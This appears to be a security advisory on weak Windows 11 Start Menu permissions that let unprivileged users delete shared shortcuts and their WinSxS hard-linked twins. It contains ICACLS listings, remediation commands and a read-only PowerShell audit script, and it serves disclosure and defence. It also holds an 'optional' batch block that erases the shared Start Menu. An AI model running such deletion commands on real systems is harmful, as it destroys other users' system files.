C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
OUCH²: on this (typical) installation of Windows 11 25H2 the vulnerability has even got worse – now multiple unprivileged users are able to remove the shared Start Menu completely!
(Optional) Clobber the shared Start Menu:
IF DEFINED WHISPER (
    ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini"
    ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk"
) ELSE (
    RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu"
)
(A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000) for the primary local user account and the superfluous ACE (A;OICIIO;DTSD;;;LA) for the local Administrator account!
Logon to the first user account created during Windows setup and start the Command Processor Cmd.exe elevated, then execute the following command lines (ICACLS.EXE also accepts a raw SID prefixed with an asterisk, for example /Remove:g *S-1-5-21-‹digits›-‹digits›-‹digits›-1002, for an ACE whose SID it printed unresolved):
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\Administrator" /T
Successfully processed 112 files; Failed processing 0 files
Successfully processed 11 files; Failed processing 0 files
Successfully processed 90 files; Failed processing 0 files
%SystemRoot%\WinSxS\ is used as repository and staging store for almost all components of Windows NT. To protect its integrity only the (virtual) service account NT SERVICE\TrustedInstaller with the security identifier S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 should have write and delete access there.
Due to the braindead implementation of the Component Based Servicing introduced with Windows Vista, files from the repository are installed via reflection, i.e. as hard links instead of true copies – modifications of installed files, for example shortcuts in the shared Start Menu, therefore change the repository. Note that all hard links of a file share one and the same security descriptor: an ACE granted on a shortcut in the shared Start Menu is thus granted on its twin in WinSxS too.
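As an added example (not code from the original page or its author), the following PowerShell script performs the check from the two preceding sections in one pass: it walks the shared Start Menu, reports every allow ACE that grants DELETE, FILE_DELETE_CHILD or GENERIC_ALL to a principal other than SYSTEM, Administrators and TrustedInstaller, and for each affected shortcut enumerates its hard-linked twins below %SystemRoot%\WinSxS via FindFirstFileNameW/FindNextFileNameW. The function name Find-WeakDeleteAces, the HardLink helper class and the choice of exactly those three trusted principals are assumptions of this example, not anything the page defines. It only reads, so it runs unelevated, and it keeps the SID next to the account name because ICACLS printed some of the SIDs above unresolved.

```powershell
#Requires -Version 5.1
# Added example, not part of the original page: audit the shared Start Menu for
# ACEs that grant delete rights to principals other than SYSTEM, Administrators
# and TrustedInstaller, and follow each affected shortcut to its hard-linked
# twins below %SystemRoot%\WinSxS. Read-only, therefore runs unelevated.

# FindFirstFileNameW/FindNextFileNameW enumerate every name (hard link) of a
# file; the names they return are relative to the volume root.
Add-Type -TypeDefinition @'
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Text;
public static class HardLink {
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern IntPtr FindFirstFileNameW(string file, uint flags, ref uint len, StringBuilder name);
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern bool FindNextFileNameW(IntPtr handle, ref uint len, StringBuilder name);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool FindClose(IntPtr handle);
    public static string[] Names(string path) {
        var names = new List<string>();
        var buffer = new StringBuilder(32768);
        uint len = (uint)buffer.Capacity;
        IntPtr handle = FindFirstFileNameW(path, 0, ref len, buffer);
        if (handle == new IntPtr(-1)) throw new Win32Exception();
        try {
            do { names.Add(buffer.ToString()); len = (uint)buffer.Capacity; }
            while (FindNextFileNameW(handle, ref len, buffer));
        } finally { FindClose(handle); }
        return names.ToArray();
    }
}
'@

# Principals that legitimately hold delete rights there (assumption of this
# example); every other principal with such rights is reported.
$TrustedSids = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # NT SERVICE\TrustedInstaller
)
# Access-mask bits that allow removal: DELETE (ICACLS "DE"), FILE_DELETE_CHILD
# ("DC") and GENERIC_ALL, which FileSystemRights has no name for, hence the raw test.
$DeleteBits = 0x10000 -bor 0x40 -bor 0x10000000

function Find-WeakDeleteAces {
    param([string]$Root = (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu'))
    $winSxS = $env:SystemRoot.Substring(2) + '\WinSxS\'   # volume-relative, e.g. \Windows\WinSxS\
    # -Force includes the hidden+system desktop.ini files listed above.
    $items = @(Get-Item -LiteralPath $Root -Force) + @(Get-ChildItem -LiteralPath $Root -Recurse -Force)
    foreach ($item in $items) {
        $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        # Ask for SIDs, not names: some of them do not resolve (ICACLS printed them raw).
        foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($TrustedSids -contains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $DeleteBits) -eq 0) { continue }
            try   { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = '<unresolved SID>' }
            $twins = @()
            if (-not $item.PSIsContainer) {   # directories cannot be hard-linked
                $drive = $item.FullName.Substring(0, 2)
                $twins = @([HardLink]::Names($item.FullName) | Where-Object { $_ -like "$winSxS*" } | ForEach-Object { $drive + $_ })
            }
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $name
                Sid       = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
                Flags     = "$($ace.InheritanceFlags)/$($ace.PropagationFlags)"
                WinSxS    = ($twins -join '; ')
            }
        }
    }
}

$findings = @(Find-WeakDeleteAces)
$findings | Format-Table -AutoSize Path, Principal, Rights, Inherited, Flags, WinSxS
# Only the non-inherited ACEs (on the Start Menu directory itself) need removing;
# everything below inherits them, and every WinSxS twin shares the same descriptor.
$findings | Where-Object { -not $_.Inherited } | Select-Object Path, Principal, Sid, Flags
```

Remediation stays with the ICACLS.EXE command lines of the previous section: the rows with Inherited = False name the explicit ACEs on the Start Menu directory that /Remove:g has to strip, and all other rows, WinSxS twins included, merely inherit them. Windows PowerShell is used here instead of Cmd.exe because Get-Acl exposes the raw access mask and the inheritance and propagation flags that ICACLS.EXE only abbreviates.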
Logon to one of the user accounts created during Windows setup and start the Command Processor Cmd.exe unelevated, then execute the following command line:
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)"
C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.1882_none_90964c57b3d34f63\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.1_none_f1eb80676c3fbe87\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.26100.5074_none_90eba575b3937e62\Event Viewer.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.26100.4202_none_76c8e866faf07366\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.26100.5074_none_76e55e9afada1d4e\Steps Recorder.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.26100.4202_none_4abe321a9b7601be\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.26100.5074_none_4adaa84e9b5faba6\Task Manager.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.1882_none_6e30c61a8a994728\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.1_none_cf85fa2a4305b64c\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-c..s-admin-compsvclink_31bf3856ad364e35_10.0.26100.5074_none_6e861f388a597627\Component Services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-c..termanagementsnapin_31bf3856ad364e35_10.0.26100.1882_none_e6b4947c26772596\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-c..termanagementsnapin_31bf3856ad364e35_10.0.26100.5074_none_e709ed9a26375495\Computer Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-charmap_31bf3856ad364e35_10.0.26100.4202_none_8e3114995451d760\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-charmap_31bf3856ad364e35_10.0.26100.5074_none_8e4d8acd543b8148\Character Map.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.26100.4202_none_091b8d9c0d8281ab\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.26100.5074_none_093803d00d6c2b93\Disk Cleanup.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.1_none_9609b71ef8d18dee\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.3323_none_34e47df340420efa\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.26100.5074_none_3509dc2d40254dc9\dfrgui.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.26100.1882_none_73899f020c320a85\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-iscsi_initiator_ui_31bf3856ad364e35_10.0.26100.5074_none_73def8200bf23984\iSCSI Initiator.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.1_none_41438fbea643a6b2\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.3323_none_e01e5692edb427be\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.5074_none_e043b4cced97668d\ODBC Data Sources (64-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.1882_none_2f75108d29d7afaa\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.1_none_90ca449ce2441ece\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-m..diagnostic-schedule_31bf3856ad364e35_10.0.26100.5074_none_2fca69ab2997dea9\Memory Diagnostics Tool.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.1882_none_4a6fe694fdd588e7\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.1_none_abc51aa4b641f80b\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-shortcut_31bf3856ad364e35_10.0.26100.5074_none_4ac53fb2fd95b7e6\Windows Media Player Legacy.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.26100.4202_none_765195be4db6c109\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.26100.5074_none_766e0bf24da06af1\System Configuration.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.26100.4202_none_47b3be11a9a4f9b0\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.26100.5074_none_47d03445a98ea398\System Information.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-p..erandprintui-pmcppc_31bf3856ad364e35_10.0.26100.4202_none_a73f992730a85600\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-p..erandprintui-pmcppc_31bf3856ad364e35_10.0.26100.5074_none_a75c0f5b3091ffe8\Print Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.4202_none_37e1156650eaa088\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
